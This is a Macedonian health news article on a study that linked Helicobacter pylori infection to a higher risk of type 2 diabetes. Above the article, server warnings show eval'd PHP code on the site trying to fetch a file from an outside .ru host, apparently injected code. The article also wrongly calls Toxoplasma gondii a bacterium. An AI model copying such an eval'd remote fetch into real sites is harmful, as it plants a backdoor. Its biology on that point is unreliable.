Бактеријата Хеликобактер пилори - виновна за дијабетот | За Здравје


Error message

  • Warning: file_get_contents(): http:// wrapper is disabled in the server configuration by allow_url_fopen=0 in eval() (line 1 of /home/zdravjem/public_html/modules/php/php.module(80) : eval()'d code).
  • Warning: file_get_contents(http://nikicsgo.ru/app.php): failed to open stream: no suitable wrapper could be found in eval() (line 1 of /home/zdravjem/public_html/modules/php/php.module(80) : eval()'d code).
                         
                           
                             

ЕНДОКРИНОЛОГИЈА

                           
                           
                           
                       

Бактеријата Хеликобактер пилори - виновна за дијабетот

Според научниците, постои врска помеѓу бактеријата Хеликобактер пилори која предизвикува чир и гастритис, и развојот на дијабетес тип 2. Студијата покажала дека луѓето инфицирани со бактеријата, се изложени на двојно поголем ризик од дијабетес.



Претходните истражувања на оваа тема покажуваат контрадикторни резултати.



За да утврдат дали едната состојба води кон другата, научниците следеле околу 800 лица во текот на една деценија. На почетокот на истражувањето никој од учесниците немал дијабетес тип 2.



Потоа 144 лица ја развиле болеста, од кои 97% од нив имале позитивен резултат на испитувањето за присуството на Хеликобактер пилори.



Откако истражувачите ги земале во предвид и другите фактори, како заболувања, пушење и прекумерна тежина, констатирале дека ризикот од развивање на дијабетес е за 2,7 пати поголем кај групата на луѓе кои имале инфекција со Хеликобактер пилори.



Според истражувачите, Хеликобактер пилори има негативно влијание врз функцијата на цревата или пак го поттикнува воспалението кое може да придонесе до дијабетес.



Околу 2/3 од луѓето во светот имаат контакт со бактеријата, но повеќето немаат присуство на симптоми, прецизира водечкиот истражувач, професорот Алисон Ајело од Универзитетот во Мичиген.



Научниците не откриваат слична врска помеѓу дијабетот и другите инфекции, како херпес, варичела вирус, цитомегаловирус, и бактеријата токсоплазма гонди.



Резултатите се објавени во списанието “Diabetes Care”

ЗА ЗДРАВЈЕ NEWSLETTER